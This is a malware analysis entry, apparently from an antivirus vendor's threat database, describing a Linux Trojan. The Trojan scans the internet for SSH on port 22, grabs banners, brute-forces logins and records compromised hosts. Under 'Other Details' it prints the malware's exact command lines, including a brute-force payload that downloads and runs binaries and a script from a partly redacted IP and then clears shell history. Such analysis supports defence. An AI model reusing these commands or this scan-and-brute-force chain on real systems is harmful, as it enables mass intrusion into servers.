search

Trojan.SH.ETIN.B

May 21, 2020
 Analysis by: Joshua Paul Ignacio
 ALIASES:

N/A

 PLATFORM:

Linux/Unix

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet, Dropped by other malware


This Trojan may be downloaded by other malware/grayware from remote sites.

  TECHNICAL DETAILS

File Size:

1,226 bytes

File Type:

Other

Memory Resident:

No

Initial Samples Received Date:

20 May 2020

Payload:

Deletes files, Downloads files, Terminates processes, Connects to URLs/IPs, Executes files

Arrival Details

This Trojan may be downloaded by the following malware/grayware from remote sites:

Installation

This Trojan drops the following files:

  • /{Malware Path}/motd
  • /{Malware Path}/shitscanner → Detected as HackingTools_Shark
    • A scanner that will search for hosts in the internet with an open Port 22.
    • The results will be stored in bios.txt
    • It accepts the following parameters:
      • Port Number
      • -a or -b (class)
        • -a (A network) must be between 1 and 254
        • -b (B network) example: 192.168
      • -i (interface)
      • -s (speed)
  • /{Malware Path}/boner → Detected as HackTool.Linux.BANGRAB.A
    • Grabs the banner of the IP addresses indicated in the "infile" paramater
    • The results will be stored in banner.log
    • The contents of banner.log will then be filtered by listing IP addresses of machines with OpenSSH running on Port 22.
    • The filtered list will be stored on mfu.txt
    • It accepts the following parameters:
      • infile - a text file that contains IP addresses
      • port
      • threads - concurrent IPs being scanned
  • /{Malware Path}/brute → Detected as HackTool.Linux.SSHBRUTE.GA
    • a Haiduc scanner
    • It will use the following as arguments to connect, download and execute files to gain control over its target:
    • Successfully compromised machines will be saved in gasite.txt

Other System Modifications

This Trojan deletes the following files:

  • /{Malware Path}/bios.txt
  • /{Malware Path}/mfu.txt
  • /{Malware Path}/banner.log

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

  • shitscanner
  • boner

Other Details

This Trojan does the following:

  • It executes the dropped files with the following paramaters:
    • timeout $timeout ./{Malware Path}/shitscanner $port -i $interface -s $speed
      • where:
        • $timeout - 130
        • $port - 22
        • $interface - eth0
        • $speed - 10
    • ./{Malware Path}/boner bios.txt 22 3500
    • ./{Malware Path}/brute 9999 -f mfu.txt pass_file 22 "wget http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 ;chmod 777 *; ./kiga.x86 ROOTS; rm -rf kiga*;wget http://{BLOCKED}.{BLOCKED}.17.186/kit.sh ;sh kit.sh; history -c"
      • where:
        • pass_file - list of credentials stored

  SOLUTION

Minimum Scan Engine:

9.850

FIRST VSAPI PATTERN FILE:

15.882.02

FIRST VSAPI PATTERN DATE:

20 May 2020

VSAPI OPR PATTERN File:

15.883.00

VSAPI OPR PATTERN Date:

21 May 2020

Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.ETIN.B. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.